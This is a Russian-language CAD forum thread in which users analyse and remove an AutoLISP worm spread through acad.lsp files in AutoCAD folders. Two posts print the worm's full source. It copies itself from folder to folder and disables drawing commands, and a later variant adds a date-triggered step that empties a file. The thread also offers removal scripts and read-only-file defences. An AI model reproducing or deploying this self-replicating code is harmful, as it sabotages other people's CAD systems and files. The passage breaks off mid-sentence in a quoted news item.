[dextron3]

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

[dextron3]

Если у кого есть возможность протестить данный вирус, или кто уже сталкивался с этим, просьба посочувст... ой поделиться решением проблемы :roll:

[ppv]

А что ты предлагаешь?
Всем, кто не боится, открыть твой архив? При условии, что уже известно что его ловит только последний антивирус.
Спасибо за новость, но проверять ее не буду :roll:

[Alaspher]

Симантек его видит и лечит - ничего страшного (скрипт).
ALS.Bursted.A

[dextron3]

В архиве маленкий ЛИСП файлик просто
поюзать его, если знаешь лисп язык
посмотреть, он сам по себе безобидный
но только с ДВЖ файлами совместно не запускай

[dextron3]

NOD 32 ВИДИТ!

А ПОЧЕМУ КАСПЕРСКИЙ НЕ ЗАМЕЧАЕТ ВОД БЕДА

[DEM]

Ну если все скрипты запускать то вще кердык мона получить.

[Кулик Алексей aka kpblc]

Вот вам несколько вариантов лекарств:
1. Установить системную переменную ACADLSPASDOC в 0
2. В меню исправить вызовы с _xref, _explode, _xbind на _.xref, _.explode, _.xbind соответвенно
3. На кнопку повесить код типа:

Код:

[Выделить все]

^C^C^P(mapcar '(lambda(x) (command "_.redefine" x)) '("xref" "explode" "xbind"));

Скажу честно, работоспособность ни одного из способов не проверял.

[DEM]

kpblc
А ты чего себе интернет установил дома.
ГЫЫ
А ты по пробуй свой код то.

[Pilot]

Цитата:

Здравствуйте! Я - компьютерный вирус. Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру. Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.

[Кулик Алексей aka kpblc]

> DEM : Ага, протянул. Правда, скорость хреноватая (немногим быстрее диалапа), но все лучше чем ничего.
Насчет опробовать - вот веришь, не до того!

[Profan]

Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.

[dextron3]

Цитата:

Сообщение от Profan Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.

Так еще при запуске он генерирует такой же ЛИСП файл в папке SUPPORT автокада и уже сидит там, как основной вирус, некоторые думают что просто удалил файл acad.lisp с принесенным файлом и все, но нужно проверить ДИСК С, потомучто иногда компьютер еще ранее заражен

[ShaggyDoc]

Цитата:

...во все проектных фирмах все автокадовские файлы заражены вирусом ...

Детские "страшилки" про "зеленую скамеечку" ...

[Кочетков Андрей]

Это не вирус.
Просто кто-то таким образом пытался защитить свои файлы от редактирования и дальнейшего использования )))

[T-Yoke]

Ну вот текст этого файла, и кто скажет, что здесь вредоносного?
------------------------------------------------------------------------------
(defun s::startup(/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path)8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn
(while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)
(if (= (substr ns1 8 7) "acadapp")
(setq lspbj 1)
)
)
(close wjm)
)
)
(if (and (= acadpath dwgpath)
(/= acadpath path))
(progn
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "acadapp.lsp"))
(if (= lspbj 0)
(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line (strcat "(load" (chr 34) "acadapp" (chr 34)")") wjm)
(write-line "(princ)" wjm)
(close wjm)
)
)
(writeapp)
)
(progn
(if (/= nowdwg "Drawing.dwg")
(progn
(setq oldacad (findfile "acadapp.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
)
)
)
)
(command "undefine" "explode")
(command "undefine" "xref")
(command "undefine" "xbind")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun writeapp()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while (setq wz (read-line wjm))
(write-line wz wjm1)
)
(close wjm)
(close wjm1)
)
)
)
(defun C:explode (/ p cont old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p(ssget))
(if p
(progn
(setq cont (sslength p))
(princ "\nSeltct objects:")
(princ cont)
(princ "found")
(princ "\n")
(princ cont)
(princ "was not able to be explode")
)
)
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xref(/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)
-------------------------------------------------------------------------

[dextron3]

а из за чего тогда антивирь ругаеца

[Кочетков Андрей]

Переопределяются некоторые команды.

[Alaspher]

Цитата:

Сообщение от dextron3 а из за чего тогда антивирь ругаеца

Изза того, что кто-то, совершенно справедливо, пожаловался антивирусникам на зловредный код, а они включили его в свои базы.

[shnn]

2 T-Yoke
вот что:

Код:

[Выделить все]

(command "undefine" "explode") 
(command "undefine" "xref") 
(command "undefine" "xbind")

А вообще считаю что это злая шутка над коллегами случайно вырвалась на свободу за пределы офиса.

[Кулик Алексей aka kpblc]

Эта "злая шутка, вырвавшаяся за пределы офиса", уже и до Казахстана дошла - мне оттуда с полгода назад примерно на это дело жаловались

[Rost]

Спасибо!
Весч оч полезная, будем ее прилагать к файлу!

[AIK]

Спасибо! Буду знать кому нельзя заказывать халтуру!

[VVA]

Пользуйтесь локализованным Автокадом, и никакая зараза к вам не пристанет.
Это я к тому, что команды записаны без префикса и в русском Автокаде выполняться не будут.

[gh5rjn]

Цитата:

Сообщение от VVA ... в русском Автокаде ...

Это в Компасе что ли. Тамто точно не будут.

[Krieger]

Подумаешь, команду переопределили...
Можно ведь было и другое прописать в прогу, например:
_select all,
_erase все на@ен,
_purge на всякий пожарный,
_qsave,
Ну и кад закрыть после этого...

[Om81]

Цитата:

Сообщение от Кулик Алексей aka kpblc Эта "злая шутка, вырвавшаяся за пределы офиса", уже и до Казахстана дошла - мне оттуда с полгода назад примерно на это дело жаловались

Так вроде:

Цитата:

dextron3 Фотограф Зарегистрирован: 01.01.2007 Сообщения: 90 Откуда: г. Алматы

- как раз)
Мне одно не очень понятно - теперь и фотографы увлекаются Автокадом? Так Фотошоп вроде удобней.. и РАВы понимает)
=))

[Alan]

Да было уже это. Немного обсуждали.
http://www.autocad.ru/cgi-bin/f1/board.cgi?t=26139Fh

[T-Yoke]

Цитата:

Сообщение от shnn 2 T-Yoke вот что: Код: [Выделить все] (command "undefine" "explode") (command "undefine" "xref") (command "undefine" "xbind") ...

Я так и подумал, что дело в переопределении команд, спасибо!

[Леонид Ильич]

Цитата:

Сообщение от Pilot Здравствуйте! Я - компьютерный вирус. Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру. Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.

Вирус с ошибкой: нужно сначала рассылать по почте, а уже потом стирать файл.

[Shoorup]

Я так и не понял, как вирус распостраняется? У нас постоянно он где-то проявляется - вывести не могут. Хотя антивирус его находит - но приходиться запускать чтоб весь комп проверил - он чтото удалит и все. Хочетелолсь бы знать как он распостраняется и как работает. Может есть ручная защита или ручное удаление. Антивирус долго гоняет и тормозит машину.

[Profan]

Цитата:

Я так и не понял, как вирус распостраняется?

Если речь идет о файле acad.lsp, то он распространяется (копируется) автоматически при открытии любого файла DWG. Таково его свойство. AutoCAD ищет этот файл в путях доступа и в рабочей папке и неминуего сам запускает его. Для удаления его не надо даже запускать антивирус. Можно хотя бы в Total Commander по маске найти эти файлы и уничтожить. Если только он не используется для служебных целей. Тогда можно один файл из папки Support оставить и вычистить его.

[Shoorup]

Если я правильно понял "вирус" работает так:
Для начала нужен файл acadapp.lsp - он записывается в C:\Documents and Settings\user\Application Data\Autodesk\AutoCAD 2008\R17.1\enu\Support может програмно а може вручную. Потом вместе с файлом идет acad.lsp в котором есть копия этого acadapp.lsp. И при удалении acad.lsp он востанавливается и готов к применению. Т.е. "не зараженный " компутер запустив единожды acad.lsp делает копию acadapp.lsp. Так?

[Profan]

Для запуска acad.lsp не нужно никакого файла acadapp.lsp.

[Shoorup]

Разобрался.
Для работы "вируса" нужен только файл acad.lsp (архив см. 1 посте)
При запуске акада выполняется код который там прописан. Но главное это то что в папке Support появляются acad.lsp с кодом

Код:

[Выделить все]

(load"acadapp")(princ)

который загружает acadapp.lsp.
Ну и получается удаляй не удаляй из рабочей папки файл acad.lsp он всеравно восстановиться из acadapp.lsp
Я конечно не америку открыл. Но во всяком случае схема понятна

[VVA]

Про тот же вирус на caduser.ru
http://www.caduser.ru/cgi-bin/f1/board.cgi?t=39100wW
1. Если для своих задач не используешь acad.lsp, то в Тотал командоре ищешь все файлы acad.lsp и acadapp.lsp и удаляешь.
2. Редактируешь свое меню, перед переопределяемыми командами ставишь точку
- вместо _EXPLODE - _.EXPLODE
- вместо _XREF - _.XREF
- вместо _XBIND - _.XBIND
Точка перед именем команды вызывает оригинальную команду Автокада, даже если она была до этого 100 раз переопределена.

[Shoorup]

У меня этот вирус всеравно не работал. Акад русский и команды эти в сад идут. Просто всем надоели эти файлы acad.lsp в папках.

[VVA]

Ну так примени п.1

[Shoorup]

От вируса избавиться не проблема (мне во всяком случае). Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.

[Солидворкер]

Цитата:

Сообщение от Shoorup От вируса избавиться не проблема (мне во всяком случае). Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.

Для этого его и внесли в антивирусные базы.

[Shoorup]

Вот решение от данного вируса. Но жаль от возможных модификаций не лечит.

Цитата:

apetim (2008-02-26 17:42:20) можно просто в пути создания вирусом файла acad.lsp (а именно — там где у вас base.dcl — по умолчанию это путь типа C:\Documents and Settings\*username*\Application Data\Autodesk\AutoCAD 2006\R16.2\enu\Support\) уже создать такой файл, задав ему в свойствах — только чтение (read-only). в таком случае вирус , пытаясь создать файл acad.lsp, обламывается и не может загружать и распространять себя впоследствии.

[VVA]

Ага, особенно

Цитата:

Но проблема сделать так чтоб он у неопытных пользователей не распостранялся. Массово нужно сделать так чтобы "вирус" вообще не мог ничего сделать.

Для неопытного пользователя проще найти все файлы acad.lsp acadapp.lsp и удалить их, включая модификации вируса.

[v110018]

действительно NOD его видит

[skif58]

Avira и Dr.Web тоже его видят и удаляют.

[Shoorup]

Ну и что, каждый раз будите гонять ноды и докторов? Не проще ли избавиться просто сделав так, чтоб он не распостранялся?

[skif58]

Цитата:

Сообщение от Shoorup Ну и что, каждый раз будите гонять ноды и докторов? Не проще ли избавиться просто сделав так, чтоб он не распостранялся?

Да я совсем и не против... Написал это только к вопросу: Видит - Не видит...

[favorite]

AVG тоже видет.

[Severe_dude]

Знакомые поймали гдето "типа вирус" под акад, скорее просто злая шутка, на всех печатаемых чертежах в нижнем левом углу печатает на рыжем фоне Слово "Привет!!!" и улыбающуюся рожу. Никто не сталкивался?

[asys]

а можешь мне в почту его прислать , forxlam@yandex.ru?

[ivan.solo]

вирус куснул меня - ну дела!

[asys]

мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство

[Кулик Алексей aka kpblc]

Найти все эти файлы и уничтожить. Создать пустой файл acad.fas в каталоге, где находится acad.exe и дать ему свойство ReadOnly.
fas практически невозможно "вскрыть".

[misht]

Вобще у нас 7 каспер спокойно увидел (7.0.0.125)

[MMH]

перепробывал, все методы, ничего неполучилось, потом скопировал с незараженного компьтера папку support, заменил у себя эту папку, и поставил для чтения, пока работает, без глюков.

[Shoorup]

Не разводи паникуMMH, этот вирус безобидный! Вот если его немного модифицировать... а возможно у тебя уже и модификация... В любом прочитай еще раз внимательно весь топик тут есть описание как избавиться от него раз и навсегда

[Antoha86]

все можно сделать проще. удаляете автокад в установке и удалении, потом ищете все файлы acaddoc в поиске с учетом системных и скрытых папок и удаляете все эти файлы. заново устанавливаете автокад и все нормально. только заново его не поймайте

[Shoorup]

Antoha86 ничего глупее не слышал. AutoCAD то зачем удалять? Проблему решили простой установкой "только чтение"! Чего еще мудрить?

[Natali m]

А можно поточнее насчет повесить код на кнопку?

[ShaggyDoc]

Слышали. Некоторые Windows предлагают переустанавливать

[Natali m]

Напишите, пожалуйста, как "повесить код на кнопку". У меня не получается.

[Shoorup]

Natali m, не пиши никогда 2 раза одно и тоже сообщение. Какой код тебе нужно повесить на конопку? О чем ты ? Макрос? Что не получается? Что делаешь, чтобы получилось?

[Кулик Алексей aka kpblc]

http://dwg.ru/art/2

[b_1]

Так если антивирус не видит, Что мне сделать, чтобы все норм работало?

[Shoorup]

b_1, просто прочитаю эту тему полностью и всё!!!

[b_1]

я так и не вижу решения проблемы, может можно сам файл вируса с диска c: удалить, знать бы где он находиться, я хочу вернуть работу автокада в прежнее положение.

[b_1]

вобщем я ввел в поиск acad.lsp и удалил все что нашлось,
вроде все хорошо работает, Нужно ли мне редактировать свое меню, и если нужно то как это сделать?

[b_1]

Ну и еще проблема. Есть така штука в автокаде - ПУЛЬТ УПРАВЛЕНИЯ.
Так вот она очень удобна для работы в 3d пространстве(2008асаd)
Я на этом пульте упраления делаю нужные себе панели упраления , ну и
работаю. А когда закрываю автокад и сахожу заново, то пульт
упраления пуст, приходится заново его настраивать. т.е. он не запоминает, а сначала все работало нормально (это как проблема с
filedia (1)) Заранее С П А С И Б.

[Кулик Алексей aka kpblc]

Последний пост не имеет никакого отношения к вирусу. Я, если честно, не очень понял: а что хотелось спросить-то?

[Хмурый]

Цитата:

Сообщение от b_1 Ну и еще проблема. Есть така штука в автокаде - ПУЛЬТ УПРАВЛЕНИЯ. Так вот она очень удобна для работы в 3d пространстве(2008асаd) Я на этом пульте упраления делаю нужные себе панели упраления , ну и работаю. А когда закрываю автокад и сахожу заново, то пульт упраления пуст, приходится заново его настраивать. т.е. он не запоминает, а сначала все работало нормально (это как проблема с filedia (1)) Заранее С П А С И Б.

Рабочее пространство с настроенным пультом пробовал сохранять?

[b_1]

Хотелось спросить как исправить эту проблему, тоже мешает работать

[b_1]

сохранение рабочего пространства не помогае
вообще пульта нет при повторном открытии

[Кулик Алексей aka kpblc]

Гидрит вашу перекись! Это - НЕ ВИРУС!
В другой топик шагом марш!

[Natali m]

А вот я опять про вирус. Как только удаляю все файлы LSP, открываю любой файл AutoCAD, они все тут же появляются снова. Как с этим бороться? И что конкретно сделать, чтобы AutoCAD открывал все файлы в одной программе? И кстати, то, что вы мне скинули про макросы, это прекрасно, мне понравилось, но у меня не вводятся команды именно с клавиатуры, а не с кнопки.

[Кулик Алексей aka kpblc]

Еще раз прочитать ветку - она недлинная.

[intrepid]

Итак, то из-за чего начался весь сыр-бор еще в 2005 году появилось...
Эту шутку еще 5 и 6 касперы находили.
Читаем


А то что в посте №51 -
это троян который вышел полтора-два месяца назад. если не ошибаюсь -китайского происхождения.

[Shoorup]

Как вскрыть вирус и почитать код? (я про acad.fas)

[Кулик Алексей aka kpblc]

http://dwg.ru/f/showpost.php?p=262114&postcount=52

[Shoorup]

Кулик Алексей aka kpblc, я это читал и поиском пользовался. Ты написал что практическиневозможно, т.е если очень хочется, то можно. Так?

[Кулик Алексей aka kpblc]

Ага, из 60-70 килобайт компилированного лиспа получить без малого метр ассемблероподобного кода - для меня это слишком. Вечером (после 22:00 Мск) постучись мне в аську - обсудим

[Apelsinov]

Мне последнее время частенько попадался этот т.н. вирус в присланных чертежах, только был он совсем безвредным, т.к. половина кода его была варварски стерта, а осталась только та, что ведала "размножением". Я говорю о старой версии lsp. В свое время написал такую штуку для защиты от этой пакости:

Код:

[Выделить все]

(defun apel-copy_acad_lsp (/
			   a base_path	      acad_lsp_path
			   acad_lsp_newname
			  )
   (if (and
	 (setq base_path	(VL-FILENAME-DIRECTORY (findfile "base.dcl"))
	       acad_lsp_path	(strcat base_path "\\acad.lsp")
	       acad_lsp_newname	"\\acad_old.lsp"
	 )
	 (cond ((eq -1 (setq a (ACET-FILE-ATTR acad_lsp_path))) T)
	       ((/= 33 a)
		(VL-FILE-RENAME
		  acad_lsp_path
		  (strcat base_path acad_lsp_newname)
		)
	       )
	 )
	 (not (close (open acad_lsp_path "W")))
	 (ACET-FILE-ATTR acad_lsp_path 33)
       )
     (alert
       (strcat
	 "Внимание! Файл по адресу:\n" acad_lsp_path
	 "\nбыл переименован в " acad_lsp_newname
	 "\nНа его месте был создан новый файл acad.lsp для защиты от вируса.
	\nНовый файл имеет свойство - только для чтения. \n")
     )
   )
)

Мне не приходило в голову,что кто-то может написать компилированную версию, и я не знал что acad.fas запускается аналогично acad.lsp.Не знаю что делает этот компилированный новый вирус, но если бы я решил такой написать, то написал бы код, заменяющий существующий acad.fas собой, и защита с созданием такого пустого файла не прошла бы.

В качестве предложения - можно написать новый хороший вирус для борьбы с имеющимся плохим Попадая в зараженный автокад, он будет записывать себя в нужные файлы, стирая оттуда плохой вирус и предотвращая новое заражение... будем бить врага его же оружием.

[Bekbolatov]

Решение проблемы по любым АвтоКад вирусам: http://dwg.ru/f/showthread.php?p=275205&

[VVA]

Еще один вариант заразы Acaddoc.lsp вирус или нет?

[Denys]

Цитата:

Сообщение от dextron3 Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ??? :idea: :idea: :idea: [ATTACH]1180033030.rar[/ATTACH]

Отсылай этот файл Касперскому в лабораторию (там есть такая функция), они быстро реагируют и вскоре, обновив антивирусные базы, твой каспер найдёт и обезвредит заразу. (Хотя ... странно что вирусу уже год, а Каспер его не знает).

Сам качать файл боюсь. :-Р

Удачи

[znatok]

Мой ответ относится к следующим сообщениям

Цитата:

Сообщение от dextron3 .... Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???

Цитата:

Сообщение от Asys мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство

Во, что выдаёт virustotal:

http://www.virustotal.com/ru/analisi...0c5-1278857854

http://www.virustotal.com/ru/analisi...3f2-1278858704

[WOL4OHOK]

Цитата:

Сообщение от VVA Еще один вариант заразы Acaddoc.lsp вирус или нет?

Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.

[Кулик Алексей aka kpblc]

Цитата:

Сообщение от WOL4OHOK что делать

Не хз, а почитать FAQ по AutoCAD

[mig84]

Цитата:

Сообщение от WOL4OHOK Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.

Взяв за основу скрипт vbs'ский сделал небольшую утилиту. Чистит все файлы *.lsp от "хвостов" этой гадости. *.mnr, *.mns, *.mnc - удаляются.
Замечена пока одна проблема как и у скрипта - если есть сетевые диски, их надо отключить перед проверкой. В отличии от скрипта - нет необходимости запускать с консоли, чтобы увидеть что именно было удалено/очищено.
ps: сборка для net.3.5 (если установлен AutoCad 2010 и дальше, то этот fw уже установлен)

[VVA]

Набрел на следующие рекомендации AUTODESK How to detect and remove the Acad.vlx virus
Тема на другом форуме про вирус acad viruse Там выложена программа KillWorm для очистки заразы из Acaddoc.lsp вирус или нет? (та, которая (setq flagx t))
Опции

Цитата:

Active to search, find, then kill the virus if it is active. Passive to search, find, then kill the virus even if it is not currently active. ALL to search all local drives and folders. ? to see a brief help about the command.

KillWorm142.lsp

[Yuriy-I]

пока удалил ...
читаю, что пропустил )))

[weltwelt]

Цитата:

Сообщение от dextron3 Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него! Принцип действия: При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает) Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ??? :idea: :idea: :idea: [ATTACH]1180033030.rar[/ATTACH]

Вирус заползает с флешки, если с среди множества файлов есть такой файлик с acad.lsp программой.

Как бороться - Удалить все acad.lsp c машины. И вместо них записать все необходимые acad.lsp с указанным атрибутом ONLY READ

В этом случае вирус не залезает. Кстати Вирусом он закидаваеся также в папку
C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 200ххх\...
Здесь тоже создать такой only-read файл acad.lsp.

На данный момент AVAST этот вирус лечит

[Солидворкер]

weltwelt, Капитан, это Вы?!

[sbi]

weltwelt Проще, создать вирус, а потом его уничтожить. Это не Вы?

[ciril]

Объявилась слегка модифицированная версия обсуждаемого файла. Выглядит как:
acad.lsp

Код:

[Выделить все]

 ++++++++++++++++++++----------------------------------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




------------------------
(defun s::startup  (/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2 kd)
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 1)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq ns1 ""
        ns2 "")
  (setq lspbj 0)
  (if (= acadpath dwgpath)
    (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acad.lsp")) (writeapp))
    (progn
      (if (/= nowdwg "Drawing.dwg")
        (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp)))))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (if (setq kd (findfile "acadisa.lin"))
    (progn (setq ns2 0)
           (if (setq ns1 (open kd "r"))
             (progn (while (setq wz (read-line ns1))
                      (if (= wjqm wz)
                        (setq ns2 1)))
                    (close ns1)))
           (if (= ns2 0)
             (progn (setq ns1 (open kd "a")) (write-line wjqm ns1) (close ns1)))
           (if (setq ns1 (open kd "r"))
             (progn (setq wz (read-line ns1)) (close ns1)))
           (if (> (getvar "date") (+ (distof wz) 8))
             (progn (setq oldacad (strcat path "acadisa.lin"))
                    (setq newacad (strcat dwgpath "a"))
                    (writeapp)
                    (if (setq wjm1 (open oldacad "w"))
                      (progn (setq wjm (open newacad "r"))
                             (setq wz (read-line wjm))
                             (write-line (rtos (getvar "date")) wjm1)
                             (setq wz (read-line wjm))
                             (if (> (getvar "date") 2452900)
                               (close (open wz "w")))
                             (while (setq wz (read-line wjm)) (write-line wz wjm1))
                             (close wjm)
                             (close wjm1)
                             (close (open newacad "w")))))))
    (progn (if (setq ns1 (open (strcat path "acadisa.lin") "w"))
             (progn (write-line (rtos (getvar "date")) ns1) (write-line wjqm ns1) (close ns1)))))
  (setvar "cmdecho" old_cmd)
  (princ))
(defun writeapp  ()
  (if (setq wjm1 (open newacad "w"))
    (progn (setq wjm (open oldacad "r"))
           (while (setq wz (read-line wjm)) (write-line wz wjm1))
           (close wjm)
           (close wjm1))))
                                        ;*************

Существенное отличие - создает файл acadisa.lin, в который записывает пути к папкам, в которых уже присутствует. На чем и построена борьба с ним:
anti.lsp

Код:

[Выделить все]

 ((eval '(lambda (/ x00 x01 x02 x03)
          (while (setq x00 (findfile "acadisa.lin")) ;ищем, пока по путям поддержки находится файл acadisa.lin
            (setq x01 0)
            (read-line (setq x02 (open x00 "r"))) ;открываем его, читаем, первая линия: дата - не нужна
            (while (setq x03 (read-line x02)) ;читаем пока не кончится
              (and (vl-file-delete (strcat (vl-filename-directory x03) "\\acad.lsp")) (setq x01 (1+ x01)))) ;удаляем acad.lsp, приращаем счетчик, возобновляем цикл чтения acadisa.lin
            (close x02) ;закрываем acadisa.lin
            (vl-file-delete x00)) ;удаляем его, возобновляем цикл поиска
          (and x01 (progn (setq s::startup nil) (princ (strcat "\nacad.lsp - " (itoa x01))))) ;переопределяем стартапп-функцию и выводим количество удаленных acad.lsp
          (princ))))

Добавить в автозагрузку. Или записью в реестр:
[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R18.1\ACAD-9000:419\Profiles\"текущий_профиль"\Dialogs\Appload\Startup]
"NStartup"="путь к файлу\\anti.LSP"
"NumStartup"="N"
"текущий профиль" - значение по умолчанию ключа profile
если файлы в автозагрузке уже есть, то этот будет последним и NumStartup увеличится на единицу.

[Wyacheslav1]

Появилась такая проблема после копирования объекта и его расчленении. Когда просто открывался ничего не было, а как скопировал себе объект и расчленил, перестал сохранять и сохранять как. Файл из Данлоада dnl5450_Shemy_stropovok_gruzov_v_pomocsh_PPRcshikam_
Воспользовался с поста 87 (спасибо!), теперь сохраняет, а сохранить как не "хотит", пишет "Неправильное имя файла".
Самое обидное что надо по диплому распечатывать и работать

[Кулик Алексей aka kpblc]

Этот вирус лечится изменением драйвера hands.sys

[Wyacheslav1]

Цитата:

Сообщение от Кулик Алексей aka kpblc Этот вирус лечится изменением драйвера hands.sys

Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?

[Солидворкер]

Цитата:

Сообщение от Wyacheslav1 Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?

Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность

[Wyacheslav1]

Цитата:

Сообщение от Солидворкер Драйвер hands.sys переводится на русский как "прямые руки" Всегда Ваш Капитан Очевидность

Лучше бы врача выпрямляющего кривые руки
Как "сохранить как"?

[KronSerg]

filedia в 1,
нормальное имя файлу давать,
чертёж от шелухи очистить,
Сохранить чертёж, скопировать в проводнике и переименовать,
Скопировать файл автосохранения,
Биться головой о стену пока не полегчает.

[gomer]

лучше с последнего начать

[oleg111]

А у меня такая проблема копируешь линию определеное количество раз ,ну допустем 8 так вот с последней скопированой линеей можно работать ,а с предыдущими ничего не зделать они заблокированы,но все это лечиться закрытием и последующим открытием файла,вопрос что это? спасибо за ответ

[KronSerg]

Попробуй:
1. Вид - Регенерировать всё
2. Правка - Выделить всё, после этого нажать "На передний план"

[MCAD]

Обнаружен вирус, похищавший чертежи AutoCAD.

Цитата:

Недавняя история с вирусом Flame, направленным на саботаж иранской ядерной программы, а также ставшие регулярными истории об очередной краже номеров кредитных карт с реквизитами владельцев - приучили нас к мысли, что в Интернет могут обворовать точно так же (а иногда и серьёзнее) как и в реальной жизни. Очередное подтверждение этой аксиомы: обнаружен специализированный вирус ACAD/Medre.A, распространяющийся вместе с инфицированными шаблонами AutoCAD и крадущий файлы с чертежами, которые тайно отсылает на ряд электронных почтовых ящиков в Китае. Вспышка вирусной атаки зафиксирована в Перу службой ESET Live Grid (облачной системой обнаружения угроз, использующей данные от пользователей ESET по всему миру). Специалисты компании обнаружили, что червь похищает файлы и отправляет их на учётные записи электронной почты в Китае. Чтобы прекратить передачу файлов, аналитики ESET связались с китайским интернет-провайдером Tencent, Национальным центром КНР по реагированию на вирусные угрозы, а также с компанией Autodesk, создателем AutoCAD. Специалисты ESET сообщают, что на момент обнаружения вируса были похищены десятки тысяч 